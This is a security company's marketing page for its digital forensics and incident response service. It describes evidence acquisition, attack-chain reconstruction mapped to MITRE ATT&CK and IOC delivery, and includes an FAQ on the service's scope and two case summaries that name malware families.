DFIR · forensics within incident response

Digital forensics: reconstruct the attack, within incident response.

After an incident you need factual answers: how they got in, what they touched, what they took out. Fortgale digital forensics is the analytical phase of incident response: evidence, chain reconstruction, IOCs. Not court expert reports, but technical analysis that drives containment and notifications.

Endpoint · logsEvidence acquisition
Attack chainVector + lateral movement
IOC · MITREMapped indicators
Standards
MITRE ATT&CK
NIST IR
ISO/IEC 27001
Output
Evidence · chain of custody
Attack timeline
IOCs
What we do · DFIR

Three questions, one reconstruction.

Fortgale forensics lives within incident response: the analysts who contain are the same who reconstruct the attack.

01 ·

Evidence acquisition

Disk and memory images, collection of logs and artefacts on endpoints and infrastructure, with preservation and chain of custody. The evidence before it degrades.

02 ·

Chain reconstruction

Initial vector, persistence, lateral movement, escalation. The attack timeline mapped to MITRE ATT&CK, from first compromise to objective.

03 ·

What was touched or exfiltrated

Distinguishing what was accessed, encrypted or copied out: the basis for notifications and for the insurance claim. Plus the IOCs to block re-entry.

Honest about the scope

Operational forensics, not courtroom forensics.

Fortgale delivers forensics as part of incident response. The evidence and reconstruction support notifications, insurance and internal decisions. Sworn reports and technical expert opinions in a judicial context are a different profession, which Fortgale does not provide: we say so clearly.

Within incident response

Forensics feeds containment and eradication. See the Incident Response service and the MDR that operates it 24·7·365.

Fuelled by research

The analysis of malware and actors (e.g. CTI, 287 tools and actors profiled) accelerates reconstruction: we already know how they move.

Real case · chain reconstruction

In Operation Storming Tide the Fortgale team reconstructed a multi-stage chain (Mora_001: Matanbuchus 3.0 → Astarion RAT → SystemBC, RClone exfiltration), MITRE-mapped, with IOCs published. Exfiltration and ransomware prevented.

Read the analysis →
Real case · malware analysis

On Nebula Broker the team analysed the proprietary BrokerLoader malware and attributed the actor: Mandiant (Google) later confirmed it as UNC4990. Forensic analysis of the code, not just the alerts.

Read the research →
FAQ · DFIR

What our forensics is (and is not).

Do you produce sworn forensic reports or court expert opinions?

No. We deliver digital forensics as a phase of incident response (DFIR): attack analysis, evidence, reconstruction. We do not offer sworn reports or technical expert opinions in a judicial context: that is a forensic profession dedicated to the legal setting, distinct from ours.

What does Fortgale forensics include?

Acquisition and preservation of evidence (disk, memory, logs), analysis of artefacts, reconstruction of vector and lateral movement, identification of what was exfiltrated, IOCs mapped to MITRE ATT&CK.

When does forensic analysis come in?

During and after an incident, within incident response. It answers three questions: how they got in, what they touched, what they took out. The answers drive containment, restore and notifications.

Does the evidence serve the authority or insurance?

Yes: it supports the data breach notification, the cyber insurance claim and internal documentation. The legal assessment and formal acts remain with the controller, the DPO or legal counsel.

Difference between DFIR and incident response?

IR is the full process (detection, containment, eradication, restore); forensics is the analytical component that reconstructs the facts. At Fortgale they are the same outpost: those who contain are those who reconstruct.

Do you need to understand what happened?

Reconstructing the attack is the first step to closing it.

Talk to the Fortgale IR team: we acquire the evidence, reconstruct the attack chain and identify what was exfiltrated, within an incident response service with a European SOC 24·7·365.

Response time: < 1 business day.